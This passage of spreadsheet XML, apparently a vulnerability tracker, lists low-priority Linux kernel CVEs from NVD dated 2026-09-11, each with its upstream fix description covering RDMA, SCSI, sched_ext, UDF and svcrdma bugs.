        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89505</t>
        </is>
      </c>
    </row>
    <row r="1000">
      <c r="A1000" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1000" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1000" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89506</t>
        </is>
      </c>
      <c r="D1000" s="5" t="inlineStr"/>
      <c r="E1000" s="5" t="inlineStr"/>
      <c r="F1000" s="5" t="inlineStr"/>
      <c r="G1000" s="5" t="inlineStr"/>
      <c r="H1000" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1000" s="5" t="inlineStr"/>
      <c r="J1000" s="5" t="inlineStr"/>
      <c r="K1000" s="5" t="inlineStr"/>
      <c r="L1000" s="5" t="inlineStr"/>
      <c r="M1000" s="5" t="inlineStr"/>
      <c r="N1000" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1000" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P1000" s="5" t="inlineStr"/>
      <c r="Q1000" s="5" t="inlineStr"/>
      <c r="R1000" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
RDMA/uverbs: Add UVERBS_ATTR_UHW to UVERBS_METHOD_REG_MR
The original commit missed that three drivers (mthca, irdma, siw) have UHW
data associated with reg_mr that cannot be passed through the ioctl. They
also assume that the udata cannot be NULL, so failing to pass a valid
udata can trigger a NULL udata crash in those drivers.
This never happens in real systems since in rdma-core ibv_cmd_reg_mr_ex()
does not accept a udata and those three drivers don't use it, however a
malicious userspace could trigger it.</t>
        </is>
      </c>
      <c r="S1000" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89506</t>
        </is>
      </c>
    </row>
    <row r="1001">
      <c r="A1001" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1001" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1001" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89509</t>
        </is>
      </c>
      <c r="D1001" s="5" t="inlineStr"/>
      <c r="E1001" s="5" t="inlineStr"/>
      <c r="F1001" s="5" t="inlineStr"/>
      <c r="G1001" s="5" t="inlineStr"/>
      <c r="H1001" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1001" s="5" t="inlineStr"/>
      <c r="J1001" s="5" t="inlineStr"/>
      <c r="K1001" s="5" t="inlineStr"/>
      <c r="L1001" s="5" t="inlineStr"/>
      <c r="M1001" s="5" t="inlineStr"/>
      <c r="N1001" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1001" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P1001" s="5" t="inlineStr"/>
      <c r="Q1001" s="5" t="inlineStr"/>
      <c r="R1001" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
RDMA/ionic: Embed counter driver data in rdma_counter allocation
Commit 7e53b31acc7f ("RDMA/core: Create and destroy rdma_counter using
rdma_zalloc_drv_obj()") requires drivers implementing counter ops to
embed struct rdma_counter in a driver-specific struct, register its size
via INIT_RDMA_OBJ_SIZE, and provide a counter_init callback.
The ionic driver was merged without this adaptation, causing a NULL
pointer dereference in alloc_and_bind() since rdma_zalloc_drv_obj()
allocates zero bytes when size_rdma_counter is unset.
Consolidate struct ionic_counter into a new struct ionic_rdma_counter
that embeds struct rdma_counter, replace the xarray with a lightweight
ida for ID allocation, and add the required counter_init and
INIT_RDMA_OBJ_SIZE declarations.</t>
        </is>
      </c>
      <c r="S1001" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89509</t>
        </is>
      </c>
    </row>
    <row r="1002">
      <c r="A1002" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1002" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1002" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89512</t>
        </is>
      </c>
      <c r="D1002" s="5" t="inlineStr"/>
      <c r="E1002" s="5" t="inlineStr"/>
      <c r="F1002" s="5" t="inlineStr"/>
      <c r="G1002" s="5" t="inlineStr"/>
      <c r="H1002" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1002" s="5" t="inlineStr"/>
      <c r="J1002" s="5" t="inlineStr"/>
      <c r="K1002" s="5" t="inlineStr"/>
      <c r="L1002" s="5" t="inlineStr"/>
      <c r="M1002" s="5" t="inlineStr"/>
      <c r="N1002" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1002" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P1002" s="5" t="inlineStr"/>
      <c r="Q1002" s="5" t="inlineStr"/>
      <c r="R1002" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
remoteproc: scp: Fix device reference leak on failed lookup
Make sure to drop the reference taken to the SCP device when attempting
to look up its driver data before the driver has been bound.
Note that holding a reference to a device does not prevent its driver
data from going away.</t>
        </is>
      </c>
      <c r="S1002" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89512</t>
        </is>
      </c>
    </row>
    <row r="1003">
      <c r="A1003" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1003" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1003" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89514</t>
        </is>
      </c>
      <c r="D1003" s="5" t="inlineStr"/>
      <c r="E1003" s="5" t="inlineStr"/>
      <c r="F1003" s="5" t="inlineStr"/>
      <c r="G1003" s="5" t="inlineStr"/>
      <c r="H1003" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1003" s="5" t="inlineStr"/>
      <c r="J1003" s="5" t="inlineStr"/>
      <c r="K1003" s="5" t="inlineStr"/>
      <c r="L1003" s="5" t="inlineStr"/>
      <c r="M1003" s="5" t="inlineStr"/>
      <c r="N1003" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1003" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P1003" s="5" t="inlineStr"/>
      <c r="Q1003" s="5" t="inlineStr"/>
      <c r="R1003" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
scsi: fnic: Use GFP_ATOMIC for VLAN alloc under spinlock
fnic_fcoe_process_vlan_resp() allocates a VLAN descriptor with
kzalloc_obj() (default GFP_KERNEL) while holding vlans_lock via
spin_lock_irqsave(). GFP_KERNEL may sleep, which is not allowed in this
atomic context and can trigger a sleeping-from-invalid-context warning
or deadlock.
Pass GFP_ATOMIC so the allocation is safe under the IRQ-safe spinlock.</t>
        </is>
      </c>
      <c r="S1003" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89514</t>
        </is>
      </c>
    </row>
    <row r="1004">
      <c r="A1004" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1004" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1004" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89515</t>
        </is>
      </c>
      <c r="D1004" s="5" t="inlineStr"/>
      <c r="E1004" s="5" t="inlineStr"/>
      <c r="F1004" s="5" t="inlineStr"/>
      <c r="G1004" s="5" t="inlineStr"/>
      <c r="H1004" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1004" s="5" t="inlineStr"/>
      <c r="J1004" s="5" t="inlineStr"/>
      <c r="K1004" s="5" t="inlineStr"/>
      <c r="L1004" s="5" t="inlineStr"/>
      <c r="M1004" s="5" t="inlineStr"/>
      <c r="N1004" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1004" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P1004" s="5" t="inlineStr"/>
      <c r="Q1004" s="5" t="inlineStr"/>
      <c r="R1004" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
scsi: core: Fill in DMA padding bytes in scsi_alloc_sgtables()
During fuzz testing, the following issue was discovered:
BUG: KMSAN: uninit-value in __dma_map_sg_attrs+0x217/0x310
 __dma_map_sg_attrs+0x217/0x310
 dma_map_sg_attrs+0x4a/0x70
 ata_qc_issue+0x9f8/0x1420
 __ata_scsi_queuecmd+0x1657/0x1740
 ata_scsi_queuecmd+0x79a/0x920
 scsi_queue_rq+0x4472/0x4f40
 blk_mq_dispatch_rq_list+0x1cca/0x3ee0
 __blk_mq_sched_dispatch_requests+0x458/0x630
 blk_mq_sched_dispatch_requests+0x15b/0x340
 __blk_mq_run_hw_queue+0xe5/0x250
 __blk_mq_delay_run_hw_queue+0x138/0x780
 blk_mq_run_hw_queue+0x4bb/0x7e0
 blk_mq_sched_insert_request+0x2a7/0x4c0
 blk_execute_rq+0x497/0x8a0
 sg_io+0xbe0/0xe20
 scsi_ioctl+0x2b36/0x3c60
 sr_block_ioctl+0x319/0x440
 blkdev_ioctl+0x80f/0xd70
 __se_sys_ioctl+0x219/0x420
 __x64_sys_ioctl+0x93/0xe0
 x64_sys_call+0x1d6c/0x3ad0
 do_syscall_64+0x4c/0xa0
 entry_SYSCALL_64_after_hwframe+0x6e/0xd8
Uninit was created at:
 __alloc_pages+0x5c0/0xc80
 alloc_pages+0xe0e/0x1050
 blk_rq_map_user_iov+0x2b77/0x6100
 blk_rq_map_user_io+0x2fa/0x4d0
 sg_io+0xad6/0xe20
 scsi_ioctl+0x2b36/0x3c60
 sr_block_ioctl+0x319/0x440
 blkdev_ioctl+0x80f/0xd70
 __se_sys_ioctl+0x219/0x420
 __x64_sys_ioctl+0x93/0xe0
 x64_sys_call+0x1d6c/0x3ad0
 do_syscall_64+0x4c/0xa0
 entry_SYSCALL_64_after_hwframe+0x6e/0xd8
Bytes 14-15 of 16 are uninitialized
Memory access of size 16 starts at ffff88800cbdb000
When processing the last unaligned element of the scatterlist, it is
supplemented with missing bytes in the amount of pad_len.  These bytes
remain uninitialized, which leads to a problem.
Extend last_sg-&gt;length by pad_len first, then use sg_zero_buffer() to
zero those pad_len bytes.  sg_zero_buffer() uses sg_miter internally,
which correctly handles sg entries spanning multiple pages and padding
that crosses a page boundary.
Found by Linux Verification Center (linuxtesting.org) with Syzkaller.</t>
        </is>
      </c>
      <c r="S1004" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89515</t>
        </is>
      </c>
    </row>
    <row r="1005">
      <c r="A1005" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1005" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1005" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89516</t>
        </is>
      </c>
      <c r="D1005" s="5" t="inlineStr"/>
      <c r="E1005" s="5" t="inlineStr"/>
      <c r="F1005" s="5" t="inlineStr"/>
      <c r="G1005" s="5" t="inlineStr"/>
      <c r="H1005" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1005" s="5" t="inlineStr"/>
      <c r="J1005" s="5" t="inlineStr"/>
      <c r="K1005" s="5" t="inlineStr"/>
      <c r="L1005" s="5" t="inlineStr"/>
      <c r="M1005" s="5" t="inlineStr"/>
      <c r="N1005" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1005" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P1005" s="5" t="inlineStr"/>
      <c r="Q1005" s="5" t="inlineStr"/>
      <c r="R1005" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
sched_ext: Don't BUG_ON a destroyed DSQ in process_deferred_reenq_users
scx_bpf_dsq_reenq() queues a deferred reenq (dru) that runs from
run_deferred(), not ops.dispatch(). If the DSQ is destroyed before the dru
runs, process_deferred_reenq_users() sees dsq-&gt;id == SCX_DSQ_INVALID and
hits the BUG_ON. destroy_dsq() doesn't flush pending drus, so just skip.
tj: Read dsq-&gt;id once with READ_ONCE(). Reading it separately in the INVALID
    check and the BUG_ON would leave a window where destroy_dsq() can
    invalidate the id between the two reads and still trigger the BUG_ON.</t>
        </is>
      </c>
      <c r="S1005" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89516</t>
        </is>
      </c>
    </row>
    <row r="1006">
      <c r="A1006" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1006" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1006" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89517</t>
        </is>
      </c>
      <c r="D1006" s="5" t="inlineStr"/>
      <c r="E1006" s="5" t="inlineStr"/>
      <c r="F1006" s="5" t="inlineStr"/>
      <c r="G1006" s="5" t="inlineStr"/>
      <c r="H1006" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1006" s="5" t="inlineStr"/>
      <c r="J1006" s="5" t="inlineStr"/>
      <c r="K1006" s="5" t="inlineStr"/>
      <c r="L1006" s="5" t="inlineStr"/>
      <c r="M1006" s="5" t="inlineStr"/>
      <c r="N1006" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1006" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P1006" s="5" t="inlineStr"/>
      <c r="Q1006" s="5" t="inlineStr"/>
      <c r="R1006" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
sched_ext: Fix rq-&gt;core_pick corruption under core scheduling
Core scheduling's pick_next_task() picks what to run on every SMT sibling of
the core in a single pass under the shared core-wide rq lock. The selection
state is consistent only while the lock is held continuously, so
-&gt;pick_task() originally could not release it. However, since 4c95380701f5
("sched/ext: Fold balance_scx() into pick_task_scx()"), sched_ext runs
dispatch from inside the pick and dispatching can drop the rq lock. To
support this, pick_next_task() has been updated to restart the whole
selection when a pick returns RETRY_TASK after releasing the lock.
When selections on the same core interleave through the dropped lock, they
corrupt each other's state: one clears the other's rq-&gt;core_pick leading to
a NULL deref, or invalidates its keep-the-previous-task decision leaving a
dequeued task running, which deadlocks the next wakeup and matches the
reported hard hangs. A cookied ping-pong load on an SMT machine makes the
interleavings frequent and kills the kernel within seconds.
Fix it by making the pick return RETRY_TASK whenever dispatch released the
rq lock, so that a selection only ever commits picks made under a
continuously held lock. The previous patch's rq-&gt;scx.lock_drop_seq counts
the releases. A dispatch that touched nothing never releases the lock and
its verdict, including "nothing to run", stands: retries are bounded, each
following a dispatch that actually did something, and an idle CPU does not
loop.
If another dispatch is already in flight on the rq, skip dispatching and
pick from what is already queued locally - the in-flight dispatch has
released the lock, so its own selection will retry and re-pick this rq,
while returning RETRY_TASK here would only spin on the lock that dispatch
needs to finish.
Balance callbacks must run in the context that queued them, so they can only
be queued on the CPU's own rq. When dispatching for another rq, run the
deferred work directly instead - that rq may consume all its picks through
the core-sched fast path and never queue the callback itself.
The put_prev_task_scx() warning about a runnable task being left behind
assumed that dispatch ran as part of the very pick that is switching away.
That now only holds on the non-core path, so gate it and drop the
cookie-match test, which is always true without core scheduling, from its
condition.</t>
        </is>
      </c>
      <c r="S1006" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89517</t>
        </is>
      </c>
    </row>
    <row r="1007">
      <c r="A1007" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1007" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1007" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89518</t>
        </is>
      </c>
      <c r="D1007" s="5" t="inlineStr"/>
      <c r="E1007" s="5" t="inlineStr"/>
      <c r="F1007" s="5" t="inlineStr"/>
      <c r="G1007" s="5" t="inlineStr"/>
      <c r="H1007" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1007" s="5" t="inlineStr"/>
      <c r="J1007" s="5" t="inlineStr"/>
      <c r="K1007" s="5" t="inlineStr"/>
      <c r="L1007" s="5" t="inlineStr"/>
      <c r="M1007" s="5" t="inlineStr"/>
      <c r="N1007" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1007" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P1007" s="5" t="inlineStr"/>
      <c r="Q1007" s="5" t="inlineStr"/>
      <c r="R1007" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
sched_ext: Fix this_rq() assumptions in dispatch kfuncs
Under core scheduling, dispatch runs from within the core-wide pick and can
target a sibling rq, so ops.dispatch() may execute on a CPU different from
the dispatched rq's. Several kfunc paths assumed the two always coincide:
- scx_dsq_move() decided whether an rq lock is held by testing this_rq()'s
  rq flags and lock-danced accordingly. A dispatch for a sibling took the
  unlocked-context branch and acquired the source rq lock on top of the
  already held dispatched rq lock which could deadlock.
- scx_bpf_sub_dispatch() dispatched this_rq() with its stashed
  sub_dispatch_prev, which is NULL when dispatching for a sibling.
- finish_dispatch(), scx_bpf_dsq_reenq() and scx_bpf_dsq_nr_queued()
  resolved SCX_DSQ_LOCAL to this CPU's local DSQ rather than the dispatched
  rq's. The latter two are callable from other rq-locked operations too,
  where SCX_DSQ_LOCAL now likewise resolves to the op's rq. This changes
  behavior also without core scheduling, e.g. for ops.enqueue() running a
  remote wakeup on the waking CPU, and is intended: which CPU happens to
  execute an operation is incidental, the op's rq is what it is operating
  on, and the resolution now matches the insert side where SCX_DSQ_LOCAL
  dispatches land on the task's rq.
Use the rq tracked by scx_locked_rq(), which is set to the dispatched rq
around ops invocations and NULL in unlocked contexts.</t>
        </is>
      </c>
      <c r="S1007" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89518</t>
        </is>
      </c>
    </row>
    <row r="1008">
      <c r="A1008" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1008" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1008" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89519</t>
        </is>
      </c>
      <c r="D1008" s="5" t="inlineStr"/>
      <c r="E1008" s="5" t="inlineStr"/>
      <c r="F1008" s="5" t="inlineStr"/>
      <c r="G1008" s="5" t="inlineStr"/>
      <c r="H1008" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1008" s="5" t="inlineStr"/>
      <c r="J1008" s="5" t="inlineStr"/>
      <c r="K1008" s="5" t="inlineStr"/>
      <c r="L1008" s="5" t="inlineStr"/>
      <c r="M1008" s="5" t="inlineStr"/>
      <c r="N1008" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1008" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P1008" s="5" t="inlineStr"/>
      <c r="Q1008" s="5" t="inlineStr"/>
      <c r="R1008" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
sched_ext: Replace SCX_RQ_BAL_KEEP with a dispatch verdict return
SCX_RQ_BAL_KEEP tells the pick to keep running the previous task, a leftover
from when balancing and picking were separate operations. An rq-level flag
only works while dispatches and picks pair up one to one, which core
scheduling breaks: selections interleave through dispatch's lock drops and a
pick can consume a stale flag, keeping a task that has since been dequeued.
Fixing core scheduling support requires the decision to travel with the
dispatch that made it. Make scx_dispatch_sched() and balance_one() return an
explicit verdict instead and drop the flag's plumbing from the tools autogen
enum headers.
Also factor the pick-side invocation, its follow-up queueing and the
post-dispatch checks out of do_pick_task_scx() into dispatch_pick(). No
functional changes intended.
v2: Drop the SCX_RQ_BAL_KEEP plumbing from the tools autogen enum headers
    as well (Andrea).</t>
        </is>
      </c>
      <c r="S1008" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89519</t>
        </is>
      </c>
    </row>
    <row r="1009">
      <c r="A1009" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1009" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1009" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89525</t>
        </is>
      </c>
      <c r="D1009" s="5" t="inlineStr"/>
      <c r="E1009" s="5" t="inlineStr"/>
      <c r="F1009" s="5" t="inlineStr"/>
      <c r="G1009" s="5" t="inlineStr"/>
      <c r="H1009" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1009" s="5" t="inlineStr"/>
      <c r="J1009" s="5" t="inlineStr"/>
      <c r="K1009" s="5" t="inlineStr"/>
      <c r="L1009" s="5" t="inlineStr"/>
      <c r="M1009" s="5" t="inlineStr"/>
      <c r="N1009" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1009" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P1009" s="5" t="inlineStr"/>
      <c r="Q1009" s="5" t="inlineStr"/>
      <c r="R1009" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
udf: reject VAT indexes equal to the entry count
UDF 1.50 virtual partition mapping uses the VAT as an array of physical
block mappings. s_num_entries stores the number of entries in that array,
not the highest valid index. The valid VAT indexes are therefore below
s_num_entries.
udf_get_pblock_virt15() currently rejects only indexes greater than
s_num_entries. A crafted image can request index s_num_entries, pass the
bounds check, and make the kernel read one entry past the allocated VAT table.
Change the check to reject block &gt;= s_num_entries, so the count is handled as
an exclusive upper bound.
A crafted UDF image reproduced this on origin/master commit
0e35b9b6ec0ffcc5e23cbdec09f5c622ad532b53 with a KASAN slab-out-of-bounds
report in udf_get_pblock_virt15().
Trail of Bits has a reproducer that triggers kernel panic demonstrating the bug, and can share it if needed.</t>
        </is>
      </c>
      <c r="S1009" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89525</t>
        </is>
      </c>
    </row>
    <row r="1010">
      <c r="A1010" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1010" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1010" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89527</t>
        </is>
      </c>
      <c r="D1010" s="5" t="inlineStr"/>
      <c r="E1010" s="5" t="inlineStr"/>
      <c r="F1010" s="5" t="inlineStr"/>
      <c r="G1010" s="5" t="inlineStr"/>
      <c r="H1010" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1010" s="5" t="inlineStr"/>
      <c r="J1010" s="5" t="inlineStr"/>
      <c r="K1010" s="5" t="inlineStr"/>
      <c r="L1010" s="5" t="inlineStr"/>
      <c r="M1010" s="5" t="inlineStr"/>
      <c r="N1010" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1010" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P1010" s="5" t="inlineStr"/>
      <c r="Q1010" s="5" t="inlineStr"/>
      <c r="R1010" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
svcrdma: Use svc_xprt_put to free listener on create failure
svc_rdma_create() calls kfree(cma_xprt) when
svc_rdma_create_listen_id() fails. svc_xprt_init() has already
acquired a net namespace reference via get_net_track(); kfree
bypasses svc_xprt_free() which releases it.
Replace the kfree() with svc_xprt_put() so the kref_init birth
reference drops to zero and svc_xprt_free() dispatches
svc_rdma_free() to clean up properly. sc_cm_id is still NULL
at that point; the preceding patch added the necessary NULL
guard in svc_rdma_free().
svc_xprt_free() also drops the module reference via
module_put(), but the caller _svc_xprt_create() does the same
on xpo_create failure, double-putting the single
try_module_get() it acquired. Take a compensating
__module_get() before the svc_xprt_put() to keep the count
balanced, matching the convention in svc_rdma_accept()'s error
path.</t>
        </is>
      </c>
      <c r="S1010" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89527</t>
        </is>
      </c>
    </row>
    <row r="1011">
      <c r="A1011" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1011" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1011" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89529</t>
        </is>
      </c>
      <c r="D1011" s="5" t="inlineStr"/>
      <c r="E1011" s="5" t="inlineStr"/>
      <c r="F1011" s="5" t="inlineStr"/>
      <c r="G1011" s="5" t="inlineStr"/>
      <c r="H1011" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1011" s="5" t="inlineStr"/>
      <c r="J1011" s="5" t="inlineStr"/>
      <c r="K1011" s="5" t="inlineStr"/>
      <c r="L1011" s="5" t="inlineStr"/>
      <c r="M1011" s="5" t="inlineStr"/>
      <c r="N1011" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1011" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P1011" s="5" t="inlineStr"/>
      <c r="Q1011" s="5" t="inlineStr"/>
      <c r="R1011" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
svcrdma: Reject oversized Read segments at decode time
The RPC/RDMA Read list decoder stores wire-supplied segment
lengths without validation. xdr_count_read_segments() checks
4-byte alignment for non-zero position values but does not
cap the segment length.
An oversized rs_length reaches svc_rdma_build_read_segment(),
which derives nr_bvec from it and can drive a large dynamic
bvec allocation before verifying that enough rq_pages remain.
If the post-allocation page-overrun guard fires, the freshly
acquired rw context is not returned, leaking the resource.
Reject any segment whose length exceeds the receive context's
page budget during Read list decoding, consistent with how
xdr_check_write_chunk() bounds Write segment counts against
rc_maxpages. Also return the rw context on the existing
post-allocation overrun path in svc_rdma_build_read_segment(),
keeping that defensive guard balanced.</t>
        </is>
      </c>
      <c r="S1011" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89529</t>
        </is>
      </c>
    </row>
    <row r="1012">
      <c r="A1012" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1012" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1012" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89531</t>
        </is>
      </c>
      <c r="D1012" s="5" t="inlineStr"/>
      <c r="E1012" s="5" t="inlineStr"/>
      <c r="F1012" s="5" t="inlineStr"/>
      <c r="G1012" s="5" t="inlineStr"/>
      <c r="H1012" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1012" s="5" t="inlineStr"/>
      <c r="J1012" s="5" t="inlineStr"/>
      <c r="K1012" s="5" t="inlineStr"/>
      <c r="L1012" s="5" t="inlineStr"/>
      <c r="M1012" s="5" t="inlineStr"/>
      <c r="N1012" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1012" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P1012" s="5" t="inlineStr"/>
      <c r="Q1012" s="5" t="inlineStr"/>
      <c r="R1012" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
svcrdma: Reject connection when transport allocation fails
handle_connect_req() returns without action when
svc_rdma_create_xprt() fails to allocate the new transport.
The CM core returns 0 for CONNECT_REQUEST events, so it does
not destroy the new rdma_cm_id. Each allocation failure under
memory pressure leaks one rdma_cm_id, and a remote peer driving
connection attempts can amplify this.
Reject the connection by returning a non-zero status from the
CM event handler, which tells the CM core to destroy the
orphaned cm_id.</t>
        </is>
      </c>
      <c r="S1012" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89531</t>
        </is>
      </c>
    </row>
    <row r="1013">
      <c r="A1013" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1013" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1013" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89539</t>
        </is>
      </c>
      <c r="D1013" s="5" t="inlineStr"/>
      <c r="E1013" s="5" t="inlineStr"/>
      <c r="F1013" s="5" t="inlineStr"/>
      <c r="G1013" s="5" t="inlineStr"/>
      <c r="H1013" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1013" s="5" t="inlineStr"/>
      <c r="J1013" s="5" t="inlineStr"/>
      <c r="K1013" s="5" t="inlineStr"/>
      <c r="L1013" s="5" t="inlineStr"/>
      <c r="M1013" s="5" t="inlineStr"/>
      <c r="N1013" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1013" s="5" t="inlineStr">
        <is>
